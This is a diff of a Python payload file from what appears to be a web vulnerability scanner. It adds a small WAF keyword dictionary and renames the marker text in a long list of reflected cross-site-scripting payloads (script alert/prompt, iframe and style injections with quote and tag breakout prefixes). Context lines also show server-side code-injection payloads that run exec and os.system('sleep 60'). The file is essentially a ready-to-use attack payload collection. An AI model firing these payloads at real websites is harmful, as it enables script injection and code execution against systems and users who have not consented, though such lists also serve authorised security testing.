@@ -292,192 +292,197 @@ def python_time_payloads():
             r'return HttpResponse(exec("import time\ntime.sleep(60)) #',
             r'return HttpResponse(exec("import os\nos.system(\'sleep 60\')")) #']
 
+def waf_payloads():
+    return {"sleep": "sleep",
+            "sql": "SELECT",
+            "xss": "script"}
+
 def xss_reflective_payloads():
-    return [r"<iframe>simple</iframe>",r"<p>simple</p>",
-            r"<script>alert('simple')</script>",
-            r"<script>prompt('simple')</script>",
-            r"<strong>simple</strong>",
+    return [r"<iframe>cobra</iframe>",r"<p>cobra</p>",
+            r"<script>alert('cobra')</script>",
+            r"<script>prompt('cobra')</script>",
+            r"<strong>cobra</strong>",
             r"<style>body{background-color:red;}</style>",
-            r"<title>simple</title>",
-            r"' <iframe>simple</iframe>",
-            r"' <p>simple</p>",
-            r"' <script>alert('simple')</script>",
-            r"' <script>prompt('simple')</script>",
-            r"' <strong>simple</strong>",
+            r"<title>cobra</title>",
+            r"' <iframe>cobra</iframe>",
+            r"' <p>cobra</p>",
+            r"' <script>alert('cobra')</script>",
+            r"' <script>prompt('cobra')</script>",
+            r"' <strong>cobra</strong>",
             r"' <style>body{background-color:red;}</style>",
-            r"' <title>simple</title>",
-            r'" <iframe>simple</iframe>',
-            r'" <p>simple</p>',
-            r'" <script>alert("simple")</script>',
-            r'" <script>prompt("simple")</script>',
-            r'" <strong>simple</strong>',
+            r"' <title>cobra</title>",
+            r'" <iframe>cobra</iframe>',
+            r'" <p>cobra</p>',
+            r'" <script>alert("cobra")</script>',
+            r'" <script>prompt("cobra")</script>',
+            r'" <strong>cobra</strong>',
             r'" <style>body{background-color:red;}</style>',
-            r'" <title>simple</title>',
-            r"'/> <iframe>simple</iframe>",
-            r"'/> <p>simple</p>",
-            r"'/> <script>alert('simple')</script>",
-            r"'/> <script>prompt('simple')</script>",
-            r"'/> <strong>simple</strong>",
+            r'" <title>cobra</title>',
+            r"'/> <iframe>cobra</iframe>",
+            r"'/> <p>cobra</p>",
+            r"'/> <script>alert('cobra')</script>",
+            r"'/> <script>prompt('cobra')</script>",
+            r"'/> <strong>cobra</strong>",
             r"'/> <style>body{background-color:red;}</style>",
-            r"'/> <title>simple</title>",
-            r'"/> <iframe>simple</iframe>',
-            r'"/> <p>simple</p>',
-            r'"/> <script>alert("simple")</script>',
-            r'"/> <script>prompt("simple")</script>',
-            r'"/> <strong>simple</strong>',
+            r"'/> <title>cobra</title>",
+            r'"/> <iframe>cobra</iframe>',
+            r'"/> <p>cobra</p>',
+            r'"/> <script>alert("cobra")</script>',
+            r'"/> <script>prompt("cobra")</script>',
+            r'"/> <strong>cobra</strong>',
             r'"/> <style>body{background-color:red;}</style>',
-            r'"/> <title>simple</title>',
-            r"'> <iframe>simple</iframe>",
-            r"'> <p>simple</p>",
-            r"'> <script>alert('simple')</script>",
-            r"'> <script>prompt('simple')</script>",
-            r"'> <strong>simple</strong>",
+            r'"/> <title>cobra</title>',
+            r"'> <iframe>cobra</iframe>",
+            r"'> <p>cobra</p>",
+            r"'> <script>alert('cobra')</script>",
+            r"'> <script>prompt('cobra')</script>",
+            r"'> <strong>cobra</strong>",
             r"'> <style>body{background-color:red;}</style>",
-            r"'> <title>simple</title>",
-            r'"> <iframe>simple</iframe>',
-            r'"> <p>simple</p>',
-            r'"> <script>alert("simple")</script>',
-            r'"> <script>prompt("simple")</script>',
-            r'"> <strong>simple</strong>',
+            r"'> <title>cobra</title>",
+            r'"> <iframe>cobra</iframe>',
+            r'"> <p>cobra</p>',
+            r'"> <script>alert("cobra")</script>',
+            r'"> <script>prompt("cobra")</script>',
+            r'"> <strong>cobra</strong>',
             r'"> <style>body{background-color:red;}</style>',
-            r'"> <title>simple</title>',
-            r"/> <iframe>simple</iframe>",
-            r"/> <p>simple</p>",
-            r"/> <script>alert('simple')</script>",
-            r"/> <script>prompt('simple')</script>",
-            r"/> <strong>simple</strong>",
+            r'"> <title>cobra</title>',
+            r"/> <iframe>cobra</iframe>",
+            r"/> <p>cobra</p>",
+            r"/> <script>alert('cobra')</script>",
+            r"/> <script>prompt('cobra')</script>",
+            r"/> <strong>cobra</strong>",
             r"/> <style>body{background-color:red;}</style>",
-            r"/> <title>simple</title>",
-            r"> <iframe>simple</iframe>",
-            r"> <p>simple</p>",
-            r"> <script>alert('simple')</script>",
-            r"> <script>prompt('simple')</script>",
-            r"> <strong>simple</strong>",
+            r"/> <title>cobra</title>",
+            r"> <iframe>cobra</iframe>",
+            r"> <p>cobra</p>",
+            r"> <script>alert('cobra')</script>",
+            r"> <script>prompt('cobra')</script>",
+            r"> <strong>cobra</strong>",
             r"> <style>body{background-color:red;}</style>",
-            r"> <title>simple</title>",
-            r"<iframe>simple</iframe> //",
-            r"<p>simple</p> //",
-            r"<script>alert('simple')</script> //",
-            r"<script>prompt('simple')</script> //",
-            r"<strong>simple</strong> //",
+            r"> <title>cobra</title>",
+            r"<iframe>cobra</iframe> //",
+            r"<p>cobra</p> //",
+            r"<script>alert('cobra')</script> //",
+            r"<script>prompt('cobra')</script> //",
+            r"<strong>cobra</strong> //",
             r"<style>body{background-color:red;}</style> //",
-            r"<title>simple</title> //",
-            r"' <iframe>simple</iframe> //",
-            r"' <p>simple</p> /",
-            r"' <script>alert('simple')</script> //",
-            r"' <script>prompt('simple')</script> //",
-            r"' <strong>simple</strong> //",
+            r"<title>cobra</title> //",
+            r"' <iframe>cobra</iframe> //",
+            r"' <p>cobra</p> /",
+            r"' <script>alert('cobra')</script> //",
+            r"' <script>prompt('cobra')</script> //",
+            r"' <strong>cobra</strong> //",
             r"' <style>body{background-color:red;}</style> //",
-            r"' <title>simple</title> //",
-            r'" <iframe>simple</iframe> //',
-            r'" <p>simple</p> //',
-            r'" <script>alert("simple")</script> //',
-            r'" <script>prompt("simple")</script> //',
-            r'" <strong>simple</strong> //',
+            r"' <title>cobra</title> //",
+            r'" <iframe>cobra</iframe> //',
+            r'" <p>cobra</p> //',
+            r'" <script>alert("cobra")</script> //',
+            r'" <script>prompt("cobra")</script> //',
+            r'" <strong>cobra</strong> //',
             r'" <style>body{background-color:red;}</style> //',
-            r'" <title>simple</title> //',
-            r"'/> <iframe>simple</iframe> //",
-            r"'/> <p>simple</p> //",
-            r"'/> <script>alert('simple')</script> //",
-            r"'/> <script>prompt('simple')</script> //",
-            r"'/> <strong>simple</strong> //",
+            r'" <title>cobra</title> //',
+            r"'/> <iframe>cobra</iframe> //",
+            r"'/> <p>cobra</p> //",
+            r"'/> <script>alert('cobra')</script> //",
+            r"'/> <script>prompt('cobra')</script> //",
+            r"'/> <strong>cobra</strong> //",
             r"'/> <style>body{background-color:red;}</style> //",
-            r"'/> <title>simple</title> //",
-            r'"/> <iframe>simple</iframe> //',
-            r'"/> <p>simple</p> //',
-            r'"/> <script>alert("simple")</script> //',
-            r'"/> <script>prompt("simple")</script> //',
-            r'"/> <strong>simple</strong> //',
+            r"'/> <title>cobra</title> //",
+            r'"/> <iframe>cobra</iframe> //',
+            r'"/> <p>cobra</p> //',
+            r'"/> <script>alert("cobra")</script> //',
+            r'"/> <script>prompt("cobra")</script> //',
+            r'"/> <strong>cobra</strong> //',
             r'"/> <style>body{background-color:red;}</style> //',
-            r'"/> <title>simple</title> //',
-            r"'> <iframe>simple</iframe> //",
-            r"'> <p>simple</p> //",
-            r"'> <script>alert('simple')</script> //",
-            r"'> <script>prompt('simple')</script> //",
-            r"'> <strong>simple</strong> //",
+            r'"/> <title>cobra</title> //',
+            r"'> <iframe>cobra</iframe> //",
+            r"'> <p>cobra</p> //",
+            r"'> <script>alert('cobra')</script> //",
+            r"'> <script>prompt('cobra')</script> //",
+            r"'> <strong>cobra</strong> //",
             r"'> <style>body{background-color:red;}</style> //",
-            r"'> <title>simple</title> //",
-            r'"> <iframe>simple</iframe> //',
-            r'"> <p>simple</p> //',
-            r'"> <script>alert("simple")</script> //',
-            r'"> <script>prompt("simple")</script> //',
-            r'"> <strong>simple</strong> //',
+            r"'> <title>cobra</title> //",
+            r'"> <iframe>cobra</iframe> //',
+            r'"> <p>cobra</p> //',
+            r'"> <script>alert("cobra")</script> //',
+            r'"> <script>prompt("cobra")</script> //',
+            r'"> <strong>cobra</strong> //',
             r'"> <style>body{background-color:red;}</style> //',
-            r'"> <title>simple</title> //',
-            r"/> <iframe>simple</iframe> //",
-            r"/> <p>simple</p> //",
-            r"/> <script>alert('simple')</script> //",
-            r"/> <script>prompt('simple')</script> //",
-            r"/> <strong>simple</strong> //",
+            r'"> <title>cobra</title> //',
+            r"/> <iframe>cobra</iframe> //",
+            r"/> <p>cobra</p> //",
+            r"/> <script>alert('cobra')</script> //",
+            r"/> <script>prompt('cobra')</script> //",
+            r"/> <strong>cobra</strong> //",
             r"/> <style>body{background-color:red;}</style> //",
-            r"/> <title>simple</title> //",
-            r"> <iframe>simple</iframe> //",
-            r"> <p>simple</p> //",
-            r"> <script>alert('simple')</script> //",
-            r"> <script>prompt('simple')</script> //",
-            r"> <strong>simple</strong> //",
+            r"/> <title>cobra</title> //",
+            r"> <iframe>cobra</iframe> //",
+            r"> <p>cobra</p> //",
+            r"> <script>alert('cobra')</script> //",
+            r"> <script>prompt('cobra')</script> //",
+            r"> <strong>cobra</strong> //",
             r"> <style>body{background-color:red;}</style> //",
-            r"> <title>simple</title> //",
-            r"<iframe>simple</iframe> <!--",
-            r"<p>simple</p> <!--",
-            r"<script>alert('simple')</script> <!--",
-            r"<script>prompt('simple')</script> <!--",
-            r"<strong>simple</strong> <!--",
+            r"> <title>cobra</title> //",
+            r"<iframe>cobra</iframe> <!--",
+            r"<p>cobra</p> <!--",
+            r"<script>alert('cobra')</script> <!--",
+            r"<script>prompt('cobra')</script> <!--",
+            r"<strong>cobra</strong> <!--",
             r"<style>body{background-color:red;}</style> <!--",
-            r"<title>simple</title> <!--",
-            r"' <iframe>simple</iframe> <!--",
-            r"' <p>simple</p> <!--",
-            r"' <script>alert('simple')</script> <!--",
-            r"' <script>prompt('simple')</script> <!--",
-            r"' <strong>simple</strong> <!--",
+            r"<title>cobra</title> <!--",
+            r"' <iframe>cobra</iframe> <!--",
+            r"' <p>cobra</p> <!--",
+            r"' <script>alert('cobra')</script> <!--",
+            r"' <script>prompt('cobra')</script> <!--",
+            r"' <strong>cobra</strong> <!--",
             r"' <style>body{background-color:red;}</style> <!--",
-            r"' <title>simple</title> <!--",
-            r'" <iframe>simple</iframe> <!--',
-            r'" <p>simple</p> <!--',
-            r'" <script>alert("simple")</script> <!--',
-            r'" <script>prompt("simple")</script> <!--',
-            r'" <strong>simple</strong> <!--',
+            r"' <title>cobra</title> <!--",
+            r'" <iframe>cobra</iframe> <!--',
+            r'" <p>cobra</p> <!--',
+            r'" <script>alert("cobra")</script> <!--',
+            r'" <script>prompt("cobra")</script> <!--',
+            r'" <strong>cobra</strong> <!--',
             r'" <style>body{background-color:red;}</style> <!--',
-            r'" <title>simple</title> <!--',
-            r"'/> <iframe>simple</iframe> <!--",
-            r"'/> <p>simple</p> <!--",
-            r"'/> <script>alert('simple')</script> <!--",
-            r"'/> <script>prompt('simple')</script> <!--",
-            r"'/> <strong>simple</strong> <!--",
+            r'" <title>cobra</title> <!--',
+            r"'/> <iframe>cobra</iframe> <!--",
+            r"'/> <p>cobra</p> <!--",
+            r"'/> <script>alert('cobra')</script> <!--",
+            r"'/> <script>prompt('cobra')</script> <!--",
+            r"'/> <strong>cobra</strong> <!--",
             r"'/> <style>body{background-color:red;}</style> <!--",
-            r"'/> <title>simple</title> <!--",
-            r'"/> <iframe>simple</iframe> <!--',
-            r'"/> <p>simple</p> <!--',
-            r'"/> <script>alert("simple")</script> <!--',
-            r'"/> <script>prompt("simple")</script> <!--',
-            r'"/> <strong>simple</strong> <!--',
+            r"'/> <title>cobra</title> <!--",
+            r'"/> <iframe>cobra</iframe> <!--',
+            r'"/> <p>cobra</p> <!--',
+            r'"/> <script>alert("cobra")</script> <!--',
+            r'"/> <script>prompt("cobra")</script> <!--',
+            r'"/> <strong>cobra</strong> <!--',
             r'"/> <style>body{background-color:red;}</style> <!--',
-            r'"/> <title>simple</title> <!--',
-            r"'> <iframe>simple</iframe> <!--",
-            r"'> <p>simple</p> <!--",
-            r"'> <script>alert('simple')</script> <!--",
-            r"'> <script>prompt('simple')</script> <!--",
-            r"'> <strong>simple</strong> <!--",
+            r'"/> <title>cobra</title> <!--',
+            r"'> <iframe>cobra</iframe> <!--",
+            r"'> <p>cobra</p> <!--",
+            r"'> <script>alert('cobra')</script> <!--",
+            r"'> <script>prompt('cobra')</script> <!--",
+            r"'> <strong>cobra</strong> <!--",
             r"'> <style>body{background-color:red;}</style> <!--",
-            r"'> <title>simple</title> <!--",
-            r'"> <iframe>simple</iframe> <!--',
-            r'"> <p>simple</p> <!--',
-            r'"> <script>alert("simple")</script> <!--',
-            r'"> <script>prompt("simple")</script> <!--',
-            r'"> <strong>simple</strong> <!--',
+            r"'> <title>cobra</title> <!--",
+            r'"> <iframe>cobra</iframe> <!--',
+            r'"> <p>cobra</p> <!--',
+            r'"> <script>alert("cobra")</script> <!--',
+            r'"> <script>prompt("cobra")</script> <!--',
+            r'"> <strong>cobra</strong> <!--',
             r'"> <style>body{background-color:red;}</style> <!--',
-            r'"> <title>simple</title> <!--',
-            r"/> <iframe>simple</iframe> <!--",
-            r"/> <p>simple</p> <!--",
-            r"/> <script>alert('simple')</script> <!--",
-            r"/> <script>prompt('simple')</script> <!--",
-            r"/> <strong>simple</strong> <!--",
+            r'"> <title>cobra</title> <!--',
+            r"/> <iframe>cobra</iframe> <!--",
+            r"/> <p>cobra</p> <!--",
+            r"/> <script>alert('cobra')</script> <!--",
+            r"/> <script>prompt('cobra')</script> <!--",
+            r"/> <strong>cobra</strong> <!--",
             r"/> <style>body{background-color:red;}</style> <!--",
-            r"/> <title>simple</title> <!--",
-            r"> <iframe>simple</iframe> <!--",
-            r"> <p>simple</p> <!--",
-            r"> <script>alert('simple')</script> <!--",
-            r"> <script>prompt('simple')</script> <!--",
-            r"> <strong>simple</strong> <!--",
+            r"/> <title>cobra</title> <!--",
+            r"> <iframe>cobra</iframe> <!--",
+            r"> <p>cobra</p> <!--",
+            r"> <script>alert('cobra')</script> <!--",
+            r"> <script>prompt('cobra')</script> <!--",
+            r"> <strong>cobra</strong> <!--",
             r"> <style>body{background-color:red;}</style> <!--",
-            r"> <title>simple</title> <!--"]
+            r"> <title>cobra</title> <!--"]
